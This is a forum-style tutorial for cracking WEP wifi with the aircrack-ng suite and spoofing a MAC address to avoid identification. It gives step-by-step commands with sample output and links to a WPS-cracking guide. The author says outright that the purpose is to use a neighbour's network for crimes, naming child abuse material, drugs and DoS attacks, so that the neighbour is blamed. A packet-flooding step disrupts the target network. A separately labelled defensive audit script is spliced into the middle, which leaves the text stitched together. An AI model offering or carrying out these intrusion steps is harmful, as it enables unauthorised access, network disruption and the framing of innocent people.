
This tutorial will teach you how to crack and connect to any wifi that is secured with WEP security or WPA with the WPS feature enabled. This will make it look like your neighbor was the one jacking off to kiddie porn, buying drugs, and mounting dos attacks against the FBI's servers. I will also teach you how to spoof your mac address -- this will prevent someone with access to the router you are connecting to from figuring out who you are. I will be assuming that all of you are running some linux distro.
#################~Mac address spoofing~###################
This is an essential step in connecting to someone else's wifi. If you follow these steps there will be no evidence proving that you were the one connected to the network.
type:
sudo ifconfig wlan0 down
sudo macchanger -r wlan0
sudo ifconfig wlan0 up
This is what it looks like when I do it:
blargh@Blargh-D:~$ sudo ifconfig wlan0 down
[sudo] password for blargh:
blargh@Blargh-D:~$ sudo macchanger -r wlan0
Permanent MAC: 8c:a9:82:12:a0:c4 (Intel Corporate)
Current MAC: 8c:a9:82:12:a0:c4 (Intel Corporate)
New MAC: ca:fb:86:d3:68:c5 (unknown)
blargh@Blargh-D:~$ sudo ifconfig wlan0 up
If it gives you some bullshit like "wlan0: ERROR while getting interface flags: No such device", do this:
sudo airmon-ng
for me this gives:
Interface Chipset Driver
wlan0 Unknown iwlwifi [phy0]
just substitute your interface for wlan0 in the previous steps if it gives you the aforementioned no such device error.
You may need to install something. To do this type:
sudo apt-get install <the shit that you need to install>
doing ifconfig wlan0 down and then bringing it back up again will probably disconnect you from whatever you are already connected to, so you may want to reconnect.
####################~Breaking WEP secured wifi~######################
Step one: read my stuff about spoofing your mac address -- you don't want to get butt raped in prison
type:
sudo ifconfig wlan0 down
sudo airodump-ng wlan0
the second command will start to print out a bunch of fun information about all the wifi networks in range. Here is what it looks like for me:
 CH  1 ][ Elapsed: 32 s ][ 2013-08-24 01:02

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

 00:18:01:FF:1C:C0  -70      114       5    0   6  54e.  WEP   WEP           these
 00:1F:33:E4:5F:48  -79       46       0    0   6  54e.  WPA2  CCMP    PSK   essids
 00:26:B8:99:F2:BF  -81       45       2    0  11  54e.  WEP   WEP           are
 74:44:01:5A:01:25  -82       14       1    0   1  54e   WPA2  CCMP    PSK   bullShit
 A0:21:B7:73:B6:5F  -83       25       7    3   1  54e   WPA2  CCMP    PSK   and
 36:46:9A:00:1C:BC  -86       11       0    0   3  54e.  WPA2  CCMP    PSK   the
 00:1F:90:E0:F3:C8  -85       13       1    0   6  54e.  WEP   WEP           bssids
 30:46:9A:00:1C:BC  -86       11       0    0   3  54e.  WPA2  CCMP    PSK   are
 00:13:46:D2:38:06  -88       17       0    0   6  54 .  WPA   TKIP    PSK   fake
 00:7F:28:CA:87:99  -88        6       0    0  11  54e.  WPA2  CCMP    PSK   FuckThePolice

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:18:01:FF:1C:C0  F0:6B:CA:13:1D:07  -49    0 - 6      0        1
 A0:21:B7:73:B6:5F  74:44:01:5A:01:24  -81    0 - 1e     0        7
 (not associated)   00:1C:10:E7:E5:3B  -83    0 - 1      0        2
Hit ctrl + c when you see a WEP secured network that you want to attack. Now we need to capture a whole bunch of information about that network and put it in a file.
Type:
sudo airodump-ng -c <channel> -w <file name> --bssid <BSSID> wlan0
It will then look like this:
 CH  3 ][ Elapsed: 1 s ][ 2013-08-24 01:47 ][ fixed channel wlan0: -1

 BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

 00:18:01:FF:1C:C0  -77   10        6       0    0   6  54e.  WEP   WEP           3

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
You will need to wait a while for this to do its work. While you are waiting open a second terminal and do:
sudo aireplay-ng -1 0 -a <BSSID> -h 00:11:22:33:44:55 -e <ESSID> wlan0
you should get a reassuring "Association successful" message within a few seconds.
Now do:
sudo aireplay-ng -3 -b <BSSID> -h 00:11:22:33:44:55 wlan0
This will create a metric shit ton of traffic on the target network and speed up your attack. It creates so much traffic that the network will be un-usable while it is running. After a few minutes your terminal will go bat shit insane displaying read write packets. You need to wait for the #Data column of the first command prompt to go above 10,000 or so. You may need more than 10k, but 10,000 has been enough most of the time I've done it. You should get up take a walk, listen to music, and have sex while you are waiting for this to happen. It may take a while, depending on the signal strength.
Now it is time to run the crack itself. Type:
sudo aircrack-ng -b <BSSID> <file name-01.cap>
obviously .cap is a file extension and file name is the file name you chose earlier. You can always look in your home directory and look at the file.
If everything works correctly the aforementioned command should yield a result looking something like this:
Opening fuckThePoliece-01.cap
Attack will be restarted every 5000 captured ivs
Starting PTW attack with 72370 ivs
KEY FOUND! [ B2:69:20:1E:CC ]
Decrypted correctly: 100%
You can use the stuff following "KEY FOUND!" (without the square brackets obviously) as the password when connecting to the wifi.
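For the defender's side of the same data, here is an added example (not part of the original post) that parses airodump-ng style AP and station rows like the ones quoted above and reports what an owner of those networks should fix: WEP or WPA/TKIP access points, a WEP AP whose #Data count is already past the roughly 10,000 IVs the post says the PTW crack needs, and any client showing the fixed 00:11:22:33:44:55 address from the post's aireplay-ng command. The column layout is assumed to match the quoted output; every address and ESSID in the sample is constructed.

```python
import re
# Constructed sample rows in the airodump-ng column layout quoted above; every address and
# name here is made up for this example (AP table first, then the station table).
AP_ROWS = """\
02:00:00:00:00:01  -70  114  14203  91  6  54e.  WEP   WEP         legacy-printer-net
02:00:00:00:00:02  -79   46      0   0  6  54e.  WPA2  CCMP  PSK   home-wifi
02:00:00:00:00:03  -88   17      3   0  6  54 .  WPA   TKIP  PSK   old-router
"""
STATION_ROWS = """\
02:00:00:00:00:01  00:11:22:33:44:55  -49  0 - 6   0   1
02:00:00:00:00:02  02:00:00:00:00:AA  -81  0 - 1e  0   7
"""
ENC_TOKENS = {"WEP", "WPA", "WPA2", "WPA3"}
AUTH_TOKENS = {"PSK", "MGT", "OPN", "SKA"}
MAC = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
KNOWN_TOOL_MAC = "00:11:22:33:44:55"   # fixed client MAC in the post's aireplay-ng -1 command
WEP_IV_THRESHOLD = 10_000              # the post reports PTW succeeding around this #Data count

def parse_ap_row(line):
    """Return (bssid, data_frames, enc, essid) for an AP row, or None for any other line."""
    tok = line.split()
    if len(tok) < 8 or not MAC.match(tok[0]):
        return None
    # Find ENC by value: the MB column can split into two tokens ("54 ."), so fixed indexes break.
    enc_idx = next((i for i, t in enumerate(tok) if t in ENC_TOKENS), None)
    if enc_idx is None:
        return None
    rest = tok[enc_idx + 2:]              # skip ENC and CIPHER
    if rest and rest[0] in AUTH_TOKENS:   # WEP rows may show an empty AUTH column
        rest = rest[1:]
    return tok[0], int(tok[3]), tok[enc_idx], " ".join(rest)

def audit(ap_text, station_text):
    """Return (bssid, severity, reason) findings: weak encryption and a tell-tale client MAC."""
    findings = []
    for line in ap_text.splitlines():
        row = parse_ap_row(line)
        if row is None:
            continue
        bssid, data, enc, essid = row
        if enc == "WEP":
            sev = "critical" if data >= WEP_IV_THRESHOLD else "high"  # #Data is the IV count PTW needs
            findings.append((bssid, sev, f"WEP on '{essid}': migrate to WPA2/WPA3"))
        elif enc == "WPA":
            findings.append((bssid, "medium", f"WPA/TKIP on '{essid}': upgrade to WPA2-AES"))
    for line in station_text.splitlines():
        tok = line.split()
        if len(tok) >= 2 and tok[1] == KNOWN_TOOL_MAC:
            findings.append((tok[0], "critical", "client uses the aireplay-ng fake-auth MAC"))
    return findings
```

Feed it the two tables from a saved airodump-ng session of your own network and the critical findings are the ones to act on first.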
########################~WPA with WPS enabled~######################
The WEP instructions took longer to write than I thought they would and I don't feel like writing anymore. Here is a link to a tutorial I found with a google search:
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
It is intended for backtrack linux, but you could easily install the necessary packages on any distro. I may come back in the future and edit this with a personally written tutorial for WPA, but right now laziness is king.
